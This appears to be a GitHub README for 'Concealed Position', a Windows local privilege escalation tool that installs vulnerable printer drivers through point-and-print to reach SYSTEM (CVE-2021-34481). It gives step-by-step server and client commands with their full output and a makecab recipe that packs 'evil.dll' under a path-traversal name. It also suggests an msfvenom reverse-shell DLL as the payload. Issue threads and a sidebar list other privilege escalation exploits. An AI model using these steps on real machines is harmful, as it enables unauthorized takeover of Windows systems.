Bring your own print driver privilege escalation tool

Overview

Concealed Position

Concealed Position is a local privilege escalation attack against Windows using the concept of "Bring Your Own Vulnerability". Specifically, Concealed Position (CP) uses the as designed package point and print logic in Windows that allows a low privilege user to stage and install printer drivers. CP specifically installs drivers with known vulnerabilities which are then exploited to escalate to SYSTEM. Concealed Position was first presented at DEF CON 29.

What exploits are available

Concealed Position offers four exploits - all with equally dumb names:

The exploits are neat because, besides SLASHINGDAMAGE, they will continue working even after the issues are patched. The only mechanism Windows has to stop users from using old drivers is to revoke the driver's certificate - something that is not(?) historically done.

But which exploit should I use?!

Probably ACIDDAMAGE. RADIANTDAMAGE and POISONDAMAGE are race conditions (to overwrite a DLL) and SLASHINGDAMAGE damage, hopefully, is patched most everywhere.

How does it work?

Concealed Position has two parts. An evil printer and a client. The client reaches out to the server, grabs a driver, gets the driver stored in the driver store, installs the printer, and exploits the install process. Easy! In MSAPI speak, the attack goes something like this:

Step 1: Stage the driver in the driver store
client to server: GetPrinterDriver
server to client: Response with driver

Stage 2: Install the driver from the driver store
client: InstallPrinterDriverFromPackage

Stage 3: Add a local printer (exploitation stage)
client: Add printer

It is important to note that SLASHINGDAMAGE doesn't actually work like that though. SLASHINGDAMAGE is an implementation of the evil printer attack described at DEFCON 28 (2020) and has long since been patched. I just so happen to enjoy the attack (it sparked the rest of this development) and figured I'd leave the exploit in my evil server... as confusing as that may be.

Is this a Windows vulnerability?

Arguably, yes. The driver store is a "trusted collection of ... third-party driver packages" that requires administrator access to modify. Using GetPrinterDriver a low privileged attacker can stage arbitrary drivers into the store. This, to me, crosses a clear security boundary.

Microsoft seemed to agree when they issued CVE-2021-34481.

Although... it's arguable that this is simply a feature of the system and not a vulnerability at all. It really doesn't matter all that much. An attacker can escalate to SYSTEM on standard Windows installs.

Which verions of Windows are affected by CVE-2021-34481?

At least Windows 8.1 and above.

How do I use these tools?

Simple! So simple there will be many paragraphs to describe it!

CP Server

First, let's look at cp_server's command line options:

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_server.exe
 _______  _______  __    _  _______  _______  _______  ___      _______  ______
|       ||       ||  |  | ||       ||       ||   _   ||   |    |       ||      |
|       ||   _   ||   |_| ||       ||    ___||  |_|  ||   |    |    ___||  _    |
|       ||  | |  ||       ||       ||   |___ |       ||   |    |   |___ | | |   |
|      _||  |_|  ||  _    ||      _||    ___||       ||   |___ |    ___|| |_|   |
|     |_ |       || | |   ||     |_ |   |___ |   _   ||       ||   |___ |       |
|_______||_______||_|  |__||_______||_______||__| |__||_______||_______||______|
 _______  _______  _______  ___   _______  ___   _______  __    _
|       ||       ||       ||   | |       ||   | |       ||  |  | |
|    _  ||   _   ||  _____||   | |_     _||   | |   _   ||   |_| |
|   |_| ||  | |  || |_____ |   |   |   |  |   | |  | |  ||       |
|    ___||  |_|  ||_____  ||   |   |   |  |   | |  |_|  ||  _    |
|   |    |       | _____| ||   |   |   |  |   | |       || | |   |
|___|    |_______||_______||___|   |___|  |___| |_______||_|  |__|    server!

CLI options:
  -h, --help                     Display the help message
  -e, --exploit arg              The exploit to use
  -c, --cabs arg (=.\cab_files)  The location of the cabinet files

Exploits available:
        ACIDDAMAGE
        POISONDAMAGE
        RADIANTDAMAGE
        SLASHINGDAMAGE

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>

Above you can see the server requires two options:

  1. The exploit to configure the printer for
  2. A path to this repositories cab_files (.\cab_files\ is the default)

For example, let's say we wanted to configure an evil printer that would serve up the ACIDDAMAGE driver. Just do this:

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_server.exe -e ACIDDAMAGE
 _______  _______  __    _  _______  _______  _______  ___      _______  ______
|       ||       ||  |  | ||       ||       ||   _   ||   |    |       ||      |
|       ||   _   ||   |_| ||       ||    ___||  |_|  ||   |    |    ___||  _    |
|       ||  | |  ||       ||       ||   |___ |       ||   |    |   |___ | | |   |
|      _||  |_|  ||  _    ||      _||    ___||       ||   |___ |    ___|| |_|   |
|     |_ |       || | |   ||     |_ |   |___ |   _   ||       ||   |___ |       |
|_______||_______||_|  |__||_______||_______||__| |__||_______||_______||______|
 _______  _______  _______  ___   _______  ___   _______  __    _
|       ||       ||       ||   | |       ||   | |       ||  |  | |
|    _  ||   _   ||  _____||   | |_     _||   | |   _   ||   |_| |
|   |_| ||  | |  || |_____ |   |   |   |  |   | |  | |  ||       |
|    ___||  |_|  ||_____  ||   |   |   |  |   | |  |_|  ||  _    |
|   |    |       | _____| ||   |   |   |  |   | |       || | |   |
|___|    |_______||_______||___|   |___|  |___| |_______||_|  |__|    server!

[+] Creating temporary space...
[+] Expanding .\cab_files\ACIDDAMAGE\LMUD1o40.cab
[+] Pushing into the driver store
[+] Cleaning up tmp space
[+] Installing print driver
[+] Driver installed!
[+] Installing shared printer
[+] Shared printer installed!
[+] Automation Done.
[!] IMPORTANT MANUAL STEPS!
[0] In Advanced Sharing Settings, Turn off password protected sharing.
[1] Ready to go!

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>

And that's it, you'll see a new printer on your system:

PS C:\Users\albinolobster\concealed_position\build\x64\Release\bin> Get-Printer

Name                           ComputerName    Type         DriverName                PortName        Shared   Publishe
                                                                                                               d
----                           ------------    ----         ----------                --------        ------   --------
ACIDDAMAGE                                     Local        Lexmark Universal v2      LPT1:           True     False
CutePDF Writer                                 Local        CutePDF Writer v4.0       CPW4:           False    False
OneNote for Windows 10                         Local        Microsoft Software Pri... Microsoft.Of... False    False
Microsoft XPS Document Writer                  Local        Microsoft XPS Document... PORTPROMPT:     False    False
Microsoft Print to PDF                         Local        Microsoft Print To PDF    PORTPROMPT:     False    False
Fax                                            Local        Microsoft Shared Fax D... SHRFAX:         False    False


PS C:\Users\albinolobster\concealed_position\build\x64\Release\bin>

Note that there is one manual step that cp_server prompts you to do. Because I'm a junk hacker, I couldn't figure out how to programmatically set the "Advanced Sharing Settings" -> "Turn off password protected sharing". You'll have to do that yourself!

The process for using SLASHINGDAMAGE is a little different. You'll need to first install CutePDF Writer (find the installers in the 3rd party directory). Then run cp_server and then you'll still need to follow a couple of manual steps and reboot.

CP Client

The client is similarly easy to use. Let's look at it's command line options:

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_client.exe
 _______  _______  __    _  _______  _______  _______  ___      _______  ______
|       ||       ||  |  | ||       ||       ||   _   ||   |    |       ||      |
|       ||   _   ||   |_| ||       ||    ___||  |_|  ||   |    |    ___||  _    |
|       ||  | |  ||       ||       ||   |___ |       ||   |    |   |___ | | |   |
|      _||  |_|  ||  _    ||      _||    ___||       ||   |___ |    ___|| |_|   |
|     |_ |       || | |   ||     |_ |   |___ |   _   ||       ||   |___ |       |
|_______||_______||_|  |__||_______||_______||__| |__||_______||_______||______|
 _______  _______  _______  ___   _______  ___   _______  __    _
|       ||       ||       ||   | |       ||   | |       ||  |  | |
|    _  ||   _   ||  _____||   | |_     _||   | |   _   ||   |_| |
|   |_| ||  | |  || |_____ |   |   |   |  |   | |  | |  ||       |
|    ___||  |_|  ||_____  ||   |   |   |  |   | |  |_|  ||  _    |
|   |    |       | _____| ||   |   |   |  |   | |       || | |   |
|___|    |_______||_______||___|   |___|  |___| |_______||_|  |__|    client!

CLI options:
  -h, --help         Display the help message
  -r, --rhost arg    The remote evil printer address
  -n, --name arg     The remote evil printer name
  -e, --exploit arg  The exploit to use
  -l, --local        No remote printer. Local attack only.
  -d, --dll arg      Path to user provided DLL to execute.

Exploits available:
        ACIDDAMAGE
        POISONDAMAGE
        RADIANTDAMAGE

First, I'd like to address the --dll option. The client has an embedded payload that will simply write the C:\result.txt file. However, users can provide their own DLL via this option. A good example of something you might want to use is an x64 reverse shell produced by msfvenom. But for the rest of this we'll just assume the embedded payload.

cp_client has two modes: remote and local. The remote option is the most interesting because it adds the vulnerable driver to the driver store (thus executing the bring your own print driver vulnerability), so we'll go with that first. Let's say I want to connect back to the evil ACIDDAMAGE printer we configured previously. I just need to provide:

  1. The exploit I want to use
  2. The evil printer IP address
  3. The name of the evil shared printer

Like this!

C:\Users\albinolobster\Desktop>cp_client.exe -r 10.0.0.9 -n ACIDDAMAGE -e ACIDDAMAGE
_______  _______  __    _  _______  _______  _______  ___      _______  ______
|       ||       ||  |  | ||       ||       ||   _   ||   |    |       ||      |
|       ||   _   ||   |_| ||       ||    ___||  |_|  ||   |    |    ___||  _    |
|       ||  | |  ||       ||       ||   |___ |       ||   |    |   |___ | | |   |
|      _||  |_|  ||  _    ||      _||    ___||       ||   |___ |    ___|| |_|   |
|     |_ |       || | |   ||     |_ |   |___ |   _   ||       ||   |___ |       |
|_______||_______||_|  |__||_______||_______||__| |__||_______||_______||______|
_______  _______  _______  ___   _______  ___   _______  __    _
|       ||       ||       ||   | |       ||   | |       ||  |  | |
|    _  ||   _   ||  _____||   | |_     _||   | |   _   ||   |_| |
|   |_| ||  | |  || |_____ |   |   |   |  |   | |  | |  ||       |
|    ___||  |_|  ||_____  ||   |   |   |  |   | |  |_|  ||  _    |
|   |    |       | _____| ||   |   |   |  |   | |       || | |   |
|___|    |_______||_______||___|   |___|  |___| |_______||_|  |__|    client!

[+] Checking if driver is already installed
[-] Driver is not available.
[+] Call back to evil printer @ \\10.0.0.9\ACIDDAMAGE
[+] Staging driver in driver store
[+] Installing the staged driver
[+] Driver installed!
[+] Starting AcidDamage
[+] Checking if C:\ProgramData\Lexmark Universal v2\ exists
[-] Target directory doesn't exist. Trigger install.
[+] Installing printer
[+] Read in C:\ProgramData\Lexmark Universal v2\Universal Color Laser.gdl
[+] Searching file contents
[+] Updating file contents
[+] Dropping updated gpl
[+] Dropping Dll.dll to disk
[+] Staging dll in c:\tmp
[+] Installing printer
[!] Mucho success!

That's it! To execute a local only attack, you just need to provide the exploit:

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_client.exe -l -e ACIDDAMAGE
_______  _______  __    _  _______  _______  _______  ___      _______  ______
|       ||       ||  |  | ||       ||       ||   _   ||   |    |       ||      |
|       ||   _   ||   |_| ||       ||    ___||  |_|  ||   |    |    ___||  _    |
|       ||  | |  ||       ||       ||   |___ |       ||   |    |   |___ | | |   |
|      _||  |_|  ||  _    ||      _||    ___||       ||   |___ |    ___|| |_|   |
|     |_ |       || | |   ||     |_ |   |___ |   _   ||       ||   |___ |       |
|_______||_______||_|  |__||_______||_______||__| |__||_______||_______||______|
_______  _______  _______  ___   _______  ___   _______  __    _
|       ||       ||       ||   | |       ||   | |       ||  |  | |
|    _  ||   _   ||  _____||   | |_     _||   | |   _   ||   |_| |
|   |_| ||  | |  || |_____ |   |   |   |  |   | |  | |  ||       |
|    ___||  |_|  ||_____  ||   |   |   |  |   | |  |_|  ||  _    |
|   |    |       | _____| ||   |   |   |  |   | |       || | |   |
|___|    |_______||_______||___|   |___|  |___| |_______||_|  |__|    client!

[+] Checking if driver is already installed
[+] Driver installed!
[+] Starting AcidDamage
[+] Checking if C:\ProgramData\Lexmark Universal v2\ exists
[-] Target directory doesn't exist. Trigger install.
[+] Installing printer
[+] Read in C:\ProgramData\Lexmark Universal v2\Universal Color Laser.gdl
[+] Searching file contents
[+] Updating file contents
[+] Dropping updated gpl
[+] Dropping Dll.dll to disk
[+] Staging dll in c:\tmp
[+] Installing printer
[!] Mucho success!

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>

Why doesn't the client have a SLASHINGDAMAGE option?

SLASHINGDAMAGE doesn't need a special client for exploitation. You can just use the UI or the command line to connect to the remote printer and that's it! Unfortunately, if you want to roll a custom payload you'll need to update the CAB in the cab_files directory. But that's easy. Something like this:

echo “evil.dll” “../../evil.dll” > files.txt
makecab /f files.txt
move disk1/1.cab exploit.cab

It's probably important to know that the version of SLASHINGDAMAGE in the repo drops ualapi.dll into SYSTEM32 and, when executed on reboot, it drops the C:\result.txt file.

Pull Requests and Bugs

Do you want to submit a pull request or file a bug? Great! I appreciate that, but if you don't provide sufficient details to reproduce a bug or explain why a pull request should be accepted then there is a 100% chance I'll close your issue without comment. I appreciate you, but I'm also pretty busy.

Other things

One thing to note is that the inject_me dll is actually embedded in the cp_client as a C array. If you update inject_me, you'll need to manually update the C array as well (just use xxd to generate the array).

Issues
  • Block unauthenticated requests - Error 1272 or 5

    Block unauthenticated requests - Error 1272 or 5

    Hi there, floyd from Pentagrid here (the "POISIONDAMAGE" guys)

    I tried to use concealed position and it worked fine until I tried to install the printer with cp_client.exe. It seems deactivating the password protected sharing in the advanced sharing settings is breaking the exploit in this setup. The error message of cp_client.exe is:

    Couldn't connect to the remote printer: 1272

    Digging a little, I found that error 1272 is probably:

    You can't access this shared folder because your organization's security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network.

    And of course if I don't deactivate password protected sharing, I get:

    Couldn't connect to the remote printer: 2

    Which is access denied, because cp_client.exe didn't authenticate.

    Some more debug info. This line fails:

    https://github.com/jacob-baines/concealed_position/blob/c41ef9b95fbce456f7685209db44004e5a7dbf0b/src/cp_client/main.cpp#L54

    OpenPrinter doc is here and is called with the first argument (pPrinterName) being an UNC path (\<name>):

    https://docs.microsoft.com/en-us/windows/win32/printdocs/openprinter

    So the question is which component is responsible for authentication on the UNC paths. Probably the machine sees that it is a non-authenticated share. So we need authentication. The question is if there is something that allows to accept any NTLM/Kerberos authentication the Windows machine is doing.

    Any chance to fix this? Any other ideas?

    Edit: I'm going to try to mount the server first (aka "net use Z: \Server\SharedFolder passwordGoesHere /USER:userAccountGoesHere /persistent:no"), then try the exploit again, I guess the UNC authentication part is transparent Windows magic to OpenPrinter and if the printer is alread "mounted" that might work

    opened by floyd-fuh 2
  • Potential bug in how cp_client.exe -l -e POISONDAMAGE works

    Potential bug in how cp_client.exe -l -e POISONDAMAGE works

    You can not run: cp_client.exe -l -e POISONDAMAGE without firstly running cp_server.exe -e POISONDAMAGE and deleting the shared printer. If you do it tells you the driver doesn't exist, if you don't delete the shared printer it tells you the printer is already installed. is this a bug?

    opened by Simon-Davies 0
Owner
Jacob Baines
Reverse Engineer & Programmer
Jacob Baines
Local Privilege Escalation Edition for CVE-2021-1675

Local Privilege Escalation Edition of CVE-2021-1675/CVE-2021-34527 Local Privilege Escalation implementation of the CVE-2021-1675/CVE-2021-34527 (a.k.

Halil Dalabasmaz 330 Jul 27, 2022
SystemGap - Maintenance Tools after privilege escalation

SystemGap 适用于解决不稳定Windows漏洞提权成功后进行权限驻守的办法 SystemGap - 监听者 SystemGap 负责监听一个任意用户可读写的匿名管道,从管道中读取命令进行执行 SystemGapClient - 发送者 SystemGapClient 负责向匿名管道中传入指令

倾旋 37 Jul 9, 2022
CVE-2021-24084 Windows Local Privilege Escalation Left officially unpatched since 2020. Hence, its still a zero day

WindowsMDM-LPE-0Day Works best on Windows 11 CVE-2021-24084 Windows Local Privilege Escalation Left officially unpatched since 2020. Hence, its still

Exploit Blizzard 35 Aug 9, 2022
Just another "Won't Fix" Windows Privilege Escalation from User to Domain Admin.

RemotePotato0 Just another "Won't Fix" Windows Privilege Escalation from User to Domain Admin. RemotePotato0 is an exploit that allows you to escalate

null 1.1k Aug 3, 2022
CVE-2021-4034 One day for the polkit privilege escalation exploit

CVE-2021-4034 One day for the polkit privilege escalation exploit Just execute make, ./cve-2021-4034 and enjoy your root shell. The original advisory

Davide Berardi 1.6k Aug 6, 2022
PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034)

CVE-2021-4034 PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034) https://seclists.org/oss-sec/2022/q1/80 http

Andris Raugulis 898 Aug 9, 2022
Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation

PwnKit Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation Usage Should work out of the box on Linux distributions based on U

Oliver Lyak 584 Aug 9, 2022
CVE-2021-4034: Local Privilege Escalation in polkit's pkexec proof of concept

CVE-2021-4034 Proof of Concept Qualys researches found a pretty cool local privilege escalation vulnerability in Polkit's pkexec: writeup, tweet. This

Marco Bonelli 20 Jun 22, 2022
This repository contains an exploit of CVE-2021-4034, a local privilege escalation in pkexec

pwnkit (CVE-2021-4034) Privilege Escalation exploit sample This repository contains an exploit of CVE-2021-4034, a local privilege escalation in pkexe

Peter Gottesman 26 Jul 19, 2022
CVE-2021-4034 Add Root User - Pkexec Local Privilege Escalation

CVE-2021-4034 CVE-2021-4034 Add Root User - Pkexec Local Privilege Escalation 根据CVE-2021-4034进行了加强,执行Exploit将会默认添加用户名rooter,密码[email protected],并且rooter用户将具

倾旋 80 Aug 10, 2022
An exploit for CVE-2021-4034 aka Pwnkit: Local Privilege Escalation in polkit's pkexec

CVE-2021-4034 Exploit Usage $ git clone https://github.com/whokilleddb/CVE-2021-4034 $ cd CVE-2021-4034 $ make [!] CVE-2021-4034 Exploit By whokilledd

whokilleddb 3 Jun 30, 2022
Loads a signed kernel driver which allows you to map any driver to kernel mode without any traces of the signed / mapped driver.

CosMapper Loads a signed kernel driver (signed with leaked cert) which allows you to map any driver to kernel mode without any traces of the signed /

null 118 Jul 26, 2022
This project aims to bring back a productive working environment on Windows 11

This project aims to bring back a productive working environment on Windows 11

Valentin-Gabriel Radu 7.3k Aug 13, 2022
evtest is a tool to print evdev kernel events

evtest is a tool to print evdev kernel events. It reads directly from the kernel device and prints a device description and the events with the value and the symbolic name.

Travis West 4 Jan 27, 2022
KePOS is a 64-bit operating system. Design and implement your own operating system

KePOS is a 64-bit operating system. The purpose of this system is to combine the theoretical knowledge and practice of the operating system, and to deepen the understanding of the operating system.

null 65 Jul 27, 2022
A continuation of FSund's pteron-keyboard project. Feel free to contribute, or use these files to make your own! Kits and PCBs are also available through my facebook page.

pteron-pcb Intro This project is the evolution of the Pteron-Keyboard project, an incredible ergonomic keyboard that was handwired only. I aimed to in

null 15 Mar 20, 2022
Control Heidelberg Wallbox Energy Control over WiFi using ESP8266 and configure your own local load management

< scroll down for English version and additional information > wbec WLAN-Anbindung der Heidelberg WallBox Energy Control über ESP8266 Die Heidelberg W

null 75 Jul 30, 2022
Apex cheat without R/W. can implement your own R/W and it will work fine

pubApexCheat Apex cheat without R/W. can implement your own R/W and it will work fine. will update readme later Aimbot Prediction and imGui draw funct

null 22 Jun 20, 2022
A fully customisable assembler for your own instruction sets

CASM A fully customisable assembler for your own instruction sets! What Is CASM? ?? Documentation ?? Command-Line Usage ?? How To Install CASM ?? Buil

Sjoerd Vermeulen 2 May 7, 2022